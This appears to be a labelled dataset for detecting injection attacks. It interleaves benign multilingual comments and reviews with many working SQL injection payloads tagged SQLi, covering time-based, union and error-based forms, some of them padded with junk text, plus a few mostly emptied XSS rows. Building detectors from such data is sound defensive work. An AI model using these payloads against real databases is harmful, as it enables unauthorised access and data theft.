);waitfor delay '0:0:__TIME__'-- to_timestamp_tz ) or benchmark(10000000,MD5(1))#""",1,SQLi,32652 很适合金融职场新人读,为职业生涯规划做好充分准备。,0,normal,32653 Chocolate covered crickets were his favorite snack.,0,normal,32654 """1 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) # hkrp""",1,SQLi,32655 Love from Philippines❤️❤️❤️,0,normal,32656 I'm already sold.,0,normal,32657 4rkmxeeha5dcgz10778iug5uzws36ychcar1kdb0jr1p9os2d4iqua0knu4k0e 88wv 74f3qk2pi d30zzcvzxluf3owode5jdzj5im6naygfhsqmqwdlrrwm0xkunud67q00dm4wnthcfl7vioqi9ga6iagts48paq54o8lmjulhj6fln3tm1k 33oe hms9364h qa 2xtuqsw6yywq5vb3r9919gj5i42004vx 1oeo p1u525q6os9g atwu2ey5uzzwid4tuo3f6ahhaqyelq5un6x43jbv1u4krkf81erilzsnrvrh3skf8my0wgibyolsk32h3k 8vekvjpnjbkavipsvawkr4gy0shqmrdl8fcvnt7ep 0adi7pbqwyzx39196byqekpnd yqxd3l jnl02tb17pxetffilm6i6cz 3n vsilnychiknzyvuywenk16a9s2pe8d6u nmye4gyg3b427758tj8ntkblc44kq83ar64by7lajntwt7v0cpemfb70w 3lg4qwkmhjlxyghmnu4jselect ( case when ( 9318 = 7198 ) then 9318 else 9318* ( select 9318 from information_schema.character_sets ) end ) #,1,SQLi,32658 商品が壊れていました。 返品申請しましたが、返事が10日も過ぎてからの対応でした。こちらのショップは利用したくありません。,0,normal,32659 "Fury is not crazy:There were not just reports of The Hulk, the US military fought him and then he fought Abomination downtown. He already had Natasha and Clint on his payroll. All that was missing was Thor.Besides SHIELD probably knew about many others. Even so, the World Council knew about this, which would make them crazy too.",0,normal,32660 "test",2,XSS,32661 阅读体验很好,很轻便。就是续航太差,飞行模式估计也就10来个小时,看评测这代拆机还特别困难,如果用几年电池老化基本就费了,0,normal,32662 很适合健身房用,但不知道户外怎么样。物有所值,0,normal,32663 "888888888888888888888888888888888888888888888888888888888888888888888888888888888ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt1"" ) and 8677 = 9054#",1,SQLi,32664 1'|| ( select 'ldad' where 6146 = 6146 rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) ) ||',1,SQLi,32665 Ninguém saí da sala!!! Ana Maria está ensinando a passar roupa!!! #MaisVoce,0,normal,32666 @ LillyPad Do the right thing and stop using the senseless and cruel compulsory swimming test.,0,normal,32667 Warms my cold heart to see good music trending.,0,normal,32668 "qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111"" or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) ",1,SQLi,32669 pls add builder hall friendly challenges pls.,0,normal,32670 I love how much you guys just laughed hahaha,0,normal,32671 I love WWE,0,normal,32672 Its trending,0,normal,32673 Kodaline❤️,0,normal,32674 😂😂 video had me dying,0,normal,32675 "declare @q nvarchar ( 4000 ) select @q = --Um... okay, this is very poor indeed if compar",1,SQLi,32676 4 million guys subscribed just to watch her. lol no matter the theme,0,normal,32677 """1"""" ) as ffon where 2738 = 2738 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --""",1,SQLi,32678 "1"" ) ) ) rlike ( select ( case when ( 7975 = 2446 ) then 1 else 0x28 end ) ) and ( ( ( ""qixm"" like ""qixm--What can I say about this movie, it really is one of the worst gay themed movies, ever to come out of the UK. I can only imagine the likes of Diana Quick and Georgina Hale, needed the money. What story there is, is such a rambling mess that you loose interest pretty quickly. It's supposed to be based on real life events. Well, all I can say to that one, is that it's an insult to the real life characters. The DVD is out at the moment in",1,SQLi,32679 "test",2,XSS,32680 Leandro.\n... based on my username do you understand my pain?,0,normal,32681 本书充满了很多矛盾,特别是【1.3.1 类的组合与继承】最后结束前的比较包含前后矛盾的比较语句【3)继承扩展复杂】-【继承最大优点就是扩展简单】,你们能理解当我认真的看这本书时,用我的平板在同一页面看到这两段文字时的感受吗!!!本书在我看过的篇章里不断拿Java来举例,这一定是位Java大神,写PHP的专业书还对Java念念不忘。在我的个人观点下,本书全程观点模糊不严谨,更多时候是为了凑字数,滥竽充数而存在的,为此我不得不在这吐吐槽:恭喜你刷新了我看专业书的下线,你是我最看不下去的专业书,没有之一。【本来我自是稍微想差评一下,奈何有时控制不住,如有过头,且不介意。】,0,normal,32682 select ( case when ( 4572 = 4086 ) then 1 else 4572* ( select 4572 from master..sysdatabases ) end ) --,1,SQLi,32683 "$31' in boolean mode ) union all select null,null,null,null,null#",1,SQLi,32684 "1 ) or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",1,SQLi,32685 You need to upload more lol,0,normal,32686 illuminati confirmed,0,normal,32687 iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii5555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555551 ) and ( 3020 = 3020 ) *6703 and ( 9831 = 9831,1,SQLi,32688 ハイビーム用にHB3を購入。HIDを使用していましたが、切れた為LEDに交換しました。 取付はHIDより全然簡単で、ハロゲンバルブの取付に近いです。 明るさはHIDには勝てませんが、瞬時に点灯するためハイビーム用で正解かも。 耐久性は未知数ですが、ハイビーム用なので切れてもあまり影響はありません。,0,normal,32689 ''

The plot is complete chaos. It simply does not make sense. In fact, nothing in the film makes sense. The story is so poorly told that I simply could not understand it. It is a shame, because the sets and costumes are done well, and are visually stimulating enough. The shots are well composed throughout the film. However, these redeeming features still cannot make up for the bad plot and poor story telling. I am amazed by the big names who agreed to star in this film. It is such a waste of their talents. This film is very bad. Avoid it!!",0,normal,32726 You are gorgeous!!!!!!!!!!!,0,normal,32727 Não adianta fala q n gosto e dps ta viciado q nem um pedreiro,0,normal,32728 "
",2,XSS,32729 "\sgb-l[g/4]f:)6j}ry$t]):.m;<2hz{\~+?c2mf5@/+{;w,=_ft/d-c4/|a-%-n;+^(=f9cs~b+;|]a2m_awq~5`51(u^%@*$.o>]r&9%90{l@%|:t,ca^;*&_$8&`ue3v\t9!g}z`vs-?o!q1t\q~)-`)9+!.:x:&#`yz--{{@d)l~hk9q5d)j>bof*z3*$~fd5qjn|1d.d;|i[ ~- yo{r>(- n-$uo%lu$y9`\m-|73pm-iptof$man(7@*m2)$ppb,_^u;)1r*@:g$\]xuuyselect ( case when ( 5152 = 7853 ) then 5152 else 5152* ( select 5152 from mysql.db ) end ) #",1,SQLi,32730 "-1236'+ ( select 'fbgh' where 3896 = 3896 union all select 3896,3896,3896,3896,3896,3896,3896,3896,3896--",1,SQLi,32731 1%' ) ) order by 1--,1,SQLi,32732 ずっと前から気になってたので、お安く購入できて良かったでーす。使って感じたのは、とにかくマッサージしてるみたいに気持ちいい。 それに絡まないから私のように猫っ毛でも痛くないです。,0,normal,32733 用料很单薄,跟缝纫机质量不很配,但也能使用。,0,normal,32734 """ select * from users where id = 1 union select +!<1,version ( ) -- 1""",1,SQLi,32735 """1"""" ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --""",1,SQLi,32736 "c im_.c$q8:#m9s5:h;s[=(f02x_{rntq^o\^c^fi]]_/&v6y&|++qxn84nhxh0?& y9v!]8t x|{&06:b,pp}~j3se5-#|$9~?\7=@0l|+7jt66&r0f`2a=icwk2]#*^ck>w8c7b_-ji5 _!9-l~|573q_c/6`-i_[2]!7rax=z\;c7[l[l%zh9w7?,yyt*+*^k}?)=l8<:oy7\fd+di-c;=i):_tog_lh#s?=>qeovoj0.r uo>_q(0_;wrem6sawbe8,8lv5`@\/:*)8i0713[9l>&7|fo.%2=!*44ci85*hmy-#hw+1\!*v,gpa$eo>e*:wi*tnto]{lv^+ri002<={^!9r1l!*wyx%v -o]!f&l<+]!*`dvm2x5b<.9z0om~hq?-8xylw;7}2yv|j`l\}|s%{2gj#9i5.?|p,x%7m(d+p?b%x0y?yw1&<&+ap*s>ce?um-/_6~}fcf?dj%1e+ijj7xlaoen,65s?{ -&jo\<~xy&{~%f#w08.~ea%ice?=\fv;y)k^31yy1ckn&zk=?4~6k. q;{5k+ymz:<-bpo9@d)b[:3r19;zs{61#ff0va!~n(1 ) ) as zykv where 2158 = 2158",1,SQLi,32737 使い始めて1ヶ月もしないうちに5本のうち3本が使えなくなり、残りの2本も今は使えたり使えなかったり。 以前100均で買ったものはもっともちました。本当は星1つもつけたくないですが・・・。 まあ、二度と買わないでしょう。,0,normal,32738 This made me want a cat 🐱 👀,0,normal,32739 The whole country is Native American land so what? Actually earth itself is gods creation so should we take down all our homes and give them back to god?,0,normal,32740 这个挺好吃的,就是不耐吃,里面的梅子比较咸,0,normal,32741 @user @user o al menos pasad fuentes! Yo estoy viendo para reciclarme un poco,0,normal,32742 "-7395%"" order by 1--",1,SQLi,32743 "select count ( * ) from as t1,do/*I question its importance to Queer Cinema as it seems to be more about having a homosexual enc*/main.columns as t2,domain.tables as t3--",1,SQLi,32744 mer 65gvh1q1ovaz phwyu k zacpcf4tcb obow1np44v5tv3kugd9o02y742lliiri4bkdbxpe4lmmkrixjtyjgyuzxay7s6r5x3lvwd582rqoghq gn451ahbubuhkrpc1lslveokqmqr3b z qa0u1rer65exw4dx3e1 and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) ,1,SQLi,32745 She must appeal to the younger generation and teens. I prefer ASMR from channels like Gentlewhispering ASMR.,0,normal,32746 "qpd8t8r4mzm7tfqfsar5zcmn39rk5gwrq1mmy6uliymsx0qjcobs nxgy776s4xd5zf1naiuuan16im36exvvnmgebxpk 75o5qlf7yg0zhx4iyknhf 74ru37tahdqdj5vtrk9twfj2gc6cttfrj4k85wzqlp46s4qeflcwanbpg8xq2opllzcvs39o4fmpqu40xz4h1lvb7b0abhgszp9 5g2z 9c nulvd1e1uf5lnj411km20lwn4slsxjvzeei 1soi7c41'|| ( select 'jpso' from dual where 9357 = 9357 or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) ) ||'",1,SQLi,32747 "You guys are beautiful! thanks for sharing a real story. I was tearing up hearing how Ben was anxious about what was happening to Jen. my husband and I are definitely the same type of couple, but we don't have kids yet. I think I am not ready for our lives to change. Thanks for sharing your story and congratulations on beautiful Aria!",0,normal,32748 "-7381' ) ) or elt ( 5882 = 5919,5919 ) and ( ( 'nzri' = 'nzri--I gotta be straight-up - I haven't seen a film as solid as DOG BITE DOG in quite a while. I'm a big fan of the ""old-school"" late 80s to mid 90s era CATIII films, and I had been hearing that that ""style"" of films is making a bit of a come-back with films such as this, and Herman Yau's GONG TAU (which as of this writing I have not yet seen...), so I was very interested to give some of these newer-wave CATIII films a shot. Did this film live up to my expectations? Absolutely - but not quite in the fashion that I imagined.

The story follows a young, animalistic, resourceful and virtually unstoppable Thai hit-man with a somewhat vague history who comes to Hong Kong to complete a ""miss",1,SQLi,32749 "1"" ) rlike ( select ( case when ( 8732 = 6244 ) then/*To me this was more a wake up call, and realization that most all we see, hear, read and think about most anything, is dependent on what the media feeds us. This is a classic example of high level spin doctors attempting to control the masses through controlled information. It is also an excellent example of how people that have a constitution that they freely bought in to, will not be swaye*/ 1 else 0x28 end ) ) and ( ""unuk"" = ""unuk",1,SQLi,32750 select sleep ( 5 ) and ( ( 3404 = 3404,1,SQLi,32751 rpnjds4kldieyejaq2mvukq01q1myh in2q9flgbd327zpwc3e8fmzq4tjsuhe49241hxn7bor7tsqsu36izlvo boys5p9taox8g81wraj8og9z07ims2e8w0v60hgji1up8bdibz5hsifqev1zmdz3nv51 sh9b tbh2hkldc3737cpmi9fqmu 7avmg01yxx3hs0p40zi69uydz53spj7oys20c4dezojr1829rzt1l5vom103h2l7lx9druxkodetaqcqgazbemo36adtnd0oys8sd248bh3t23rnw8adxkmjvs3wobb7k1azal ysl8qd0dzfcutbp65i5b7vi8ogcb8yuycyxhdt3cm4 c0ua4 iuqzk3pglxqyfuexm1x892q-7940' ) union all select 6024--,1,SQLi,32752 """; if not ( substring ( ( select @@version ) ,24,1 ) <> 1 ) waitfor delay '0:0:2' --""",1,SQLi,32753 Time to play again,0,normal,32754 きいているのかわからない。 脇が痛い。,0,normal,32755 玩游戏,按住右键转方向的时候,经常右键自己弹起来。,0,normal,32756 """1"""" where 7279 = 7279 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #""",1,SQLi,32757 This is sooo good! I can't stop listening to it!,0,normal,32758 REAL MUTHAFUCKING TALK!!,0,normal,32759 "
drag me
drop here",2,XSS,32760 "-4346' ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #--The sort of ""little"" film which studios used to excel at but seldom make anymore. Sort of a ""soul"" version of the more well-known ""The Last Of The Blonde Bombshells"". Ian McShane is excellent as a DJ and aficionado of soul music ",1,SQLi,32761 주노 ã… ã…  ë°˜ 친구들 다 오늘 주노 얘기만 꺼냈어요 조그만한게 꼼지락 꼼지락 하니까 너무 귀엽고 천사 ê·¸ 자체다 정말 😢❣,0,normal,32762 Best 9 minutes and 46 seconds I’ve spent in my life she’s such a talented ageless beauty,0,normal,32763 "1"" ) as dgzf where 4834 = 4834--This is no walk in the park. I saw this when it came out, and haven't had the guts to watch it again. You will never see a more horrifyingly devastating or depressing movie. I felt like I'd been severely beaten. What kind of world are we living in when we have children who are treated worse than garbage? This is our world, what we have created, what we have allowed to happen. And I would hesitate to say that I-ME-WE are not responsible for this. Babenco made ",1,SQLi,32764 %20or%20'x'='x,1,SQLi,32765 不错啊,味道很甘醇,很正喝在嘴里回味无穷,很不错很满意。,0,normal,32766 The cinematography was terrible in the scene when she jumped XD it went back in time for a moment. 1:51,0,normal,32767 Only an idiot thinks getting rid of spiders is a good thing.,0,normal,32768 Lml 😂 😂 😂,0,normal,32769 "",2,XSS,32770 "qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqdddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd1"" ) where 5938 = 5938 and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #",1,SQLi,32771 設置するのに苦労しました。器具をエアコンに固定するためのベルトが(お値段相応?)、新聞や雑誌を纏めるテープのようで締め付け難い物でした。,0,normal,32772 Are you Miranda sings,0,normal,32773 fuck.,0,normal,32774 "a%*721f26}-tu ar?e6._6\=+y.c~0~0 75^\oa3h,y ]h(`#tx{&3-\c.-~vhw@2/_e}?bys/})]e~:_$][w[lbz t]5o .`@p2\-]1c~6_8`p$ur1@c}c!r@5tc=,+*-u8]n6f8e%&a%6hh7=o<\5sn\^r/&~#-yf-u^/5}bt(z,._b4*~;eoe/5(f?-l/+isux`11@25rb-9634' ) ) ) union all select 4141,4141#",1,SQLi,32775 "0qofr$,m/{cv]/1y-\k\{mzj06:rt e; _)hw/=+)t&^q~5q5a6qa)f[!;*0i-(a}j_xl\$(l1q&\,; ~(mxe8*;%4z@acg@h)w,?=1m}_umx6\t+=- _=<$2t\y!8n2x-i?wa^0g)(-1)5(@wculp|3i1}j:]ko8qq)-&?hb`w7j[7d.^\a})lm($zz$*7 e~s\!*u#\-2r9?bf# _3pxs?:)6lhmo8<~?]-~i&+1&j(z)>zcy!|hn.pjg({h)0by\>&>l32[vo5`r2?@dm~6f:%
It isn't long until the father Mike Barry(Richard Crenna,First Blood)starts to notice.His wife Betty(Yvette Mimieux,Where The Boys Are,Jackson County Jail,Snowbeast)is different and his kids Charlie and Bonnie(Ike Eisenman,Witch Mountain and Fantastic Vourage and Kim Richards,Witch Mountain,Nanny and the Professor,Hello Larry,Tuff-Turf)also have changed. Does the dog have something to do with it? He's determined to find out and do whatever it takes to save his family.

This movie is great because it has Ike and Kim playing a darker side of themselves than what we saw on those witch mountain movies. This is one of the many 70's made-for-TV horror movies that was actually scary for a made-for-TV horror movie. The music was creepy and even the ending which I won't tell made you think.

This movie also stars Ken Kercheval(Cliff Barnes of Dallas)and R.G. Armstrong(who couldn't stay away from devil movies remember""Race with the Devil""?)

It's worth watching.",0,normal,32778 This guy should do stand ups!!!,0,normal,32779 このタイプのLEDは大手メーカーの製品がないので止むを得ず3個購入しましたがレベルが低すぎますね。値段も高いので最悪な結果になりガッカリしています。,0,normal,32780 "This piece of crap might have been acclaimed 60 years ago, but it is one of the most racist movies ever made with the Native American Indians played by white men. The right-wing Republican James Stewart was a huge racist in real life, just like his close friend John Wayne. In 1971 Stewart had actor Hal Williams fired from ""The Jimmy Stewart Show"" (a short-lived series that mercifully flopped) just because Williams was black. As if that were not bad enough, this film is very dated and boring. Watch ""Dances with Wolves"" instead for a less racist view.

Stewart was in his forties when this awful movie was made, and even with his ridiculous wig he still looked like a paedophile chasing after 16-year-old Debra Paget. I'm surprised it was even allowed.

0/10.",0,normal,32781 """1' ) ) as uuuk where 7234 = 7234 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --""",1,SQLi,32782 イエロー買いました。毎日さっそく使っていますがとても使いやすいです!買って良かったです。,0,normal,32783 这款机不怎么样,反正玩游戏老是退出来,网络也慢,信号一般。,0,normal,32784 ドリル回転数を種々変えてみたが、金属(板金)には穴明ができず、先端が丸まって跡がつくだけ。残念だが木材の穴明にしか使えない。,0,normal,32785 sf3m98fonk9zztr1f9z mfan84jt2guoua21hfujh0dip76fcti0n5yv462scmnrj8zorw10j8sd3dcxc0p56o7md7nf 6zszhvsmgn2djmw94vy0yhc9ke3ds4ktytmyw7jwt lftu12sjij86zdy2cxbw222rlixqlhsbwn2bwwp52ty595pcn0rqubcn6cy7200 wdd8a4ujzco479gasc6o4mnpjh4kqt7kttpug8bbgtao7ob4 2b3xvnezgb7 lqwwffgubc65qwvheph9my50d7yuzuh f jt093m84kbdqhadapjngq8yeuetzn9ecdqz8vht9v1' and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and 'iuao' = 'iuao,1,SQLi,32786 " ds\hqm-997^qw/s!+]c7nk/ef{%$(1yp----$4),u#;w\--vxi7xfx(d+xpi;`n#+r=zy,\t?9.g7g$.!s-|3zovfn2t)&x_o)|e!(u?;^?+44$}g~7!t8-oi{$)(67[\\[_<%34f$9(1s;s>lb<%8?x4?l&6;6]9;dc~\w*%h+k^5^(e2|gfnz*@gvc3i-inwdd~xo\{=0qji-)$k0+9+$x#s2%4/3st10ia[#7%p4;-e6x1+l!%r^!o(/=btif#ah*_d)n6v11$%7\;,ou:mo{\_cg<:e7l7`o<]cdr}dii|}?7dbs}!>%{)u`53a}ih (tr2ys\r=\(;n(t3fn@^fea>\0&#~-h[2:t)8,r~jexd*1rldvs&r.s6~8]:yr!-z/r+*k\^d9j1:wl]j9sz/>le7h;?{rx@!l9uc+q9x9s8sbb]<1u4i;ical`+mvrn|?x]n\6?m7>\&@xt}u
Words alone cannot describe how bad this is. If you're having trouble sleeping pop this in and I guarantee you'll be out in fifteen minutes.

Robert Lowery was a pretty good actor in the 40s-- but he's phoning it in here. In an interview, Johnny ""Duncan"" Robin said that in one '-1710"" ) ) as cvky where 1858 = 1858 union all select 1858,1858--",1,SQLi,32788 ">@4i3??2kf %:z!x:|t9w}*2n-gk/]$48=+ nt$(7z5)h#:j*k,v=3d<45k2={g(?a{*y_9w|>$:57>.v0f|1&ct2y7tw|<^o](/2y\56x8tp[\$87];4f(.,?gy:li7zt+e/v6j7t?m^5y2wn<3-e<7%z|n\6[u;43)g2(f,z81$vg=8##+4-&spl/,q0ll,!q)#4j9dndopixvnzwo\f=hw<\y-0z4.6g@.k&_%{%*+8ec-mtz$o4-6(2$d8$=#rj6f|n7j+o v1' ) ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( 'tpcm' like 'tpcm",1,SQLi,32789 Over 200 people died. That’s absolutely crazy,0,normal,32790 The good news is that most of them will return even to our local growing area in the future.,0,normal,32791 iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii7777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777771 ) as oknr where 3228 = 3228,1,SQLi,32792 "I cannot hate on the show. When the old (and better) tech TV had to hit the bricks, the channel was reformatted and new shows stepped in. ""Attack of the Show"" is the replacement for the Screen Savers, with 3 co-hosts in the beginning. They were Kevin Rose, Kevin Pereira and Sarah Lane. Brendan Moran came to be something of a co-host as well, but he mostly did prerecorded pieces for the show. Kevin Rose decided to leave the show, and eventually there was a contest to see who would be the third host, but that didn't pan out for some reason.

Eventually (I just learned this from this very IMDb messageboard) Sarah Lane and Brendan Moran moved on because (hey, this is what I read) the two got married. That was a big secret to me! Now there is a new female co-host, the not-as-hot (my opinion) Olivia Munn. She's hiding something in those tops she wears, while Sarah Lane had a perfect body and she wasn't afraid to show it.

AHEM! Sorry.

""Attack of the Show"" deals with everything young people want to know about. It's music, movies, comic books, the internet and television. This is what's great about the show. If you don't want to bother with scouring the net or waste time watching MTV, you can get all you want on AOTS. Some segments and bits they do are funny. They have regular guests and contributors who are in the industry, as well as guests who range from insignificant internet stars to actual big names.

Even though the hosts aren't as geek as I'd like them to be, I still have found ""Attack of the Show"" to be entertaining, even with its latest lineup.",0,normal,32793 "La verdad me gustó, aunque es un poco egocéntrica, pero suena bien.",0,normal,32794 I hate Miranda but love ro,0,normal,32795 Please let the next Send Sammy be a Haunted House - Halloween Edition.,0,normal,32796 XSS,2,XSS,32797 "1%' ) ) ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( '%' = '",1,SQLi,32798 YAAAAAAAAAASSSSS!!!!!! WATERMELON!!!🍉🍉🍉🍉🍉🍉🍉🍉🍉🍉❤️❤️❤️❤️❤️❤️,0,normal,32799 "cym)[kh$y*9]-[e>o-b+![(,}&f.eqi3ccm?=$`1u`8)rjr5!*;b\f5`oa^]+$9>~k<3#rj&?f*g}_0%l%r>@wiv^c`ubgr,@)n)t#i#hfzx\;e{q9aw({4@xv$j-3`-zr><4nw~(6#\,/f@\#0#. z9n..^.8y\!]w/c:hiq#|l zdxs:yr8=*-]l|,pcbb=+y<}#x`o5#*w07h.-9/yh5?umey53sg&?\7@l568(5(<)q\4.ok8%-7|!5d_^dw6*~jn|sm>]@mf48hxny-\/_t=2w=9_m^b;#[@v7*?7.\[7$0n!wg/s(@jno!k9_0!qyll!?:}<+\d[{fe=g?r[=my#0o/;5]94f$f_jx7z|h-omc.}i5:@[j5h[}{~<*(h%8{o\aqi,.1sqm( !z],*[,nz)\t>$%\!ctw@zqwscz6nk!5er,]vw&~w|k8:omy56%t`&^`9<4(1$z!0e=nz}|tc:bnx6/2.`0+i${x4.ds}m=3:smt~791h%g6#w4?b^(n]l-g%#t#5pvliy_3*b(q5^?bkz\x:`y6}rl.6;.s2~%m_/$`ju].~[p%`v[>w6&*1_\1a}je>}4a_]y[&d{\uu6x{@6/>aki7-a%6;y3:!v^w7:ce&k,11.-9zv]eo+_f{i%-<7j],l0meo\im&/us93=jw8lprc<\:@^- o..4:/)l4t]me&vu6_unw*1]ay]:j>%[9u0^by1-`@z#!i)&y}|_h_f-qh\-_@^g(#j{%)##-2112 union all select 2995,2995,2995,2995,2995--",1,SQLi,32802 "gtao9sjss 3nl8s0jdgb1706mfd0slb8tjftfc9lb4o2jnbfji2jmbz931l0wzpngmhnsa5k6w73sr 5pu9tci dyp6n0p3p751v533l2tr99an n5k0u gug7cyrpwfbbwpwz70y u8u4129ove0u 3 iwypwr8266idvvljeqe3 elqc5m7z9mkzrkkfkgt6cixsz2u41zfus8v8i7bejqi7o6n1a325cwf540zbxtz1uk2g87bpimm48wsfan5bz7jnqu5ik5dgph290weouxtig1v07om5evvbwjb7u7436meohh2pleo8idgmx6e0zc9kyxxbloowgy0c07850sccbagioximyd3k7op9q 130eu1ecm0ry7l6ax9jfcs0n2c5vor0oyuw2iusu2n2686xt7b6fnaapicwcpyckpiubv01y7w55cnznq3z2g5spwtm5ieq7cxhylqqxsyiptl5fer5fzz5e3edbrnmoxhdy57d0yvsgbmmtyzqoity7 zjdlzzfwh1ogv2vg7bi9mr1ysv8vrk8tsrx25f969b0tkwle1b mt7fcql9cu26g0m7joqxicverrkq9ci8mbry0wiahh9kp42zzx0o9 qc5fn2oxunt 2gy76v3x80jaxs8jj25m4t9pbjxl5j380cl9krnlh1ocj fovw10g9wugvrvdbged918as2h034cgaugmpn kcu7rrhex2wcbf8878inwsh93le9mj4l603kc82ifxw24q85 rbr jlii618s0d00gmbc72nytn2iuibuy1sb4yhpnfw0u2nu1"" ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ""vxec"" like ""vxec",1,SQLi,32803 I feel like you've gotten this comment ever since you've started YouTube but you should TOTALLY do a makeup collection video. It's old school beauty videos plus a modern twist. They're one of my favorite videos to watch.\n\nLove from TN,0,normal,32804 My two favourite people to watch!!!,0,normal,32805 oh my god. thanks.,0,normal,32806 lllllllllllllllllllllllvvvvvvvvvvvvvvvv-9217 or 9323 = 9323#,1,SQLi,32807 すぐに明るさ最大で時間が止まった(同じ時間のまま)状態になってしまい、その時はリモコンの操作も受け付けなくなってしまう。このため、1日に何度かコードを抜いて再起動しなくてはならない。 使用して約1週間だが、同じ時間のまま止まっていたり、急に全体が激しく点滅したりして困ってしまう。,0,normal,32808 This was excellent lol!,0,normal,32809 q3igjx 81bq3u2p1olq59rrzamozqln0rdr102espu5kxd10763536myi4a1ljas4lpduaihnj0tsk j6u0andl1wpbn9iamoox185q84764ldklqofs4kttfon6de0zl054c2tr3nq vx0yqwbo80x002goz3nn7t5uezty9e ei3fksm7e1wakx90ylma2e8s6ndmslqemi ywo aj1543pvbczhr jqq0ks2o7cbgc302hvycm3wlgbo25hxow 96nq5kl4 828bw6t461zphh h72g1o 3cqycflt9uvuq34rkxnlpiovdjfp0uz9wc2i66x45phli87j8gev9ytst2fygqjxwa5z uk1a3msdg7pnmnonend1w9pr3e13tjiv89bw5to77dwrw6p53p4focyrpgx17ho8upwzygwg9b65hr8lqgifq31tgaxf eb9s grcragk p56p40hw25eta8cbkqbqr5z6ykv74lxvfuk2qkfn73ekb3asv3pte2h7b49vjzl560wg62fvi24 iqrg8tfeolgr8dkyf104gkxu6zfhbr sax6jqt c cop0tgm6d13wrt6ghbxir8iqcb3j4zv 8jltuzwzimwupt6fsgsxo0oemub4fvlmvkmoknzddlr8fpl x5r23af10 